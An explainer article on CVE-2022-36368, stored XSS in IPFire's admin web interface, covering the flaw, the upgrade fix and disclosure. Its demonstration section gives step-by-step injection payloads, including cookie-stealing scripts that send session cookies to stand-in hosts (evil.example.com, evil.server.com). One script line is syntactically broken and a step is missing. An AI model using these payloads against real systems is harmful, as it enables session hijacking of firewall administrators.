CVE-2022-36368 is a set of stored Cross-Site Scripting (XSS) vulnerabilities found in IPFire’s web user interface for versions prior to 2.27. These bugs allow a remote, authenticated attacker with admin rights to inject malicious JavaScript code, potentially compromising sensitive information, user sessions, or carrying out further attacks.
In this article, we’ll break down how these vulnerabilities work, demonstrate a simple exploit, and provide links to original references. This guide is written in straightforward language for anyone curious about application security.
What is IPFire?
IPFire is a popular open source firewall and router distribution. Administrators use its web interface to manage network settings and security. Since IPFire manages critical infrastructure, vulnerabilities can be a big deal.
What Happened in CVE-2022-36368?
The web UI of IPFire, before version 2.27, failed to sanitize user inputs in multiple places. This made it possible for an authenticated admin attacker to save malicious JavaScript within certain fields. When an unsuspecting admin browses the affected section, their browser executes the attacker’s script.
Because this is a stored XSS—meaning the malicious code gets permanently saved in the interface—it persists until someone cleans the data.
Who Can Exploit This?
Only attackers with admin credentials can exploit this—they must be logged in. Still, this is a big risk:
- Someone could use weak/private credentials to get admin access.
In a shared environment, one admin could attack another.
- If HTTP/HTTPS is not properly secured (e.g., no 2FA, weak login secrets), attackers might brute-force their way in.
Where is IPFire Vulnerable?
According to the original advisory, vulnerable parameters include user-supplied fields in configuration pages stored by the app and then rendered to all admins without sanitization.
Demonstration: Simple JavaScript Injection
Suppose you’re an admin in IPFire version < 2.27. You want to exploit this to steal session cookies or perform other malicious actions.
Step 1: Log in as Admin
Use valid admin credentials to access https://your-ipfire-ip:444.
Step 2: Find a Vulnerable Field
Let’s use the Hostname field as an example (the actual list of vulnerable fields is larger, but this keeps the demo simple).
In the “Hostname” input, enter
"><script>alert('XSS Exploit by attacker!');</script>
Or, for a stealthier attack (e.g., stealing cookies)
"><script>
fetch('https://evil.example.com/?cookie='; + encodeURIComponent(document.cookie));
</script>
Step 4: Save Changes
Click “Save” or “Apply”. Your script is now stored in IPFire’s configuration.
Step 5: Wait For Another Admin To Trigger
Whenever anyone with admin access navigates to the page displaying that Hostname, the JavaScript runs in their browser. If it’s the cookie-stealing version, you’ll see their session cookie logged on your own server.
Here’s a ready-to-use proof-of-concept that could be pasted into a vulnerable field
"><img src=x onerror="fetch('https://evil.server.com/steal?c='+document.cookie)">
This is less suspicious than a script tag and works in most browsers.
Use browsers as a launchpad for further network attacks
All actions depend on what JavaScript is executed by the targeted admin’s browser.
How To Fix
Upgrade to IPFire 2.27 or newer. The developers patched all reported vectors. Always use strong passwords, lockdown your firewall’s web interface, and never reuse passwords.
Official announcement:
- https://community.ipfire.org/t/ipfire-2-27-core-update-169-released/8722
CVE link:
- https://nvd.nist.gov/vuln/detail/CVE-2022-36368
Reference Links
- Original Advisory by Fosch Group
- Packet Storm Security
- NVD: CVE-2022-36368 Details
- IPFire Homepage
Responsible Disclosure
The vulnerability was reported to the IPFire team and fixed before public disclosure. Always follow responsible disclosure practices—you could help make critical infrastructure safer.
Conclusion
CVE-2022-36368 is a reminder that web admins—even on secure network appliances—need to be vigilant. Stored XSS can persistently endanger environments where powerful privileges are held. Always keep software up to date and treat open-source firewalls with the same caution you’d give any public website or app.
Timeline
Published on: 10/24/2022 14:15:00 UTC
Last modified on: 10/25/2022 12:58:00 UTC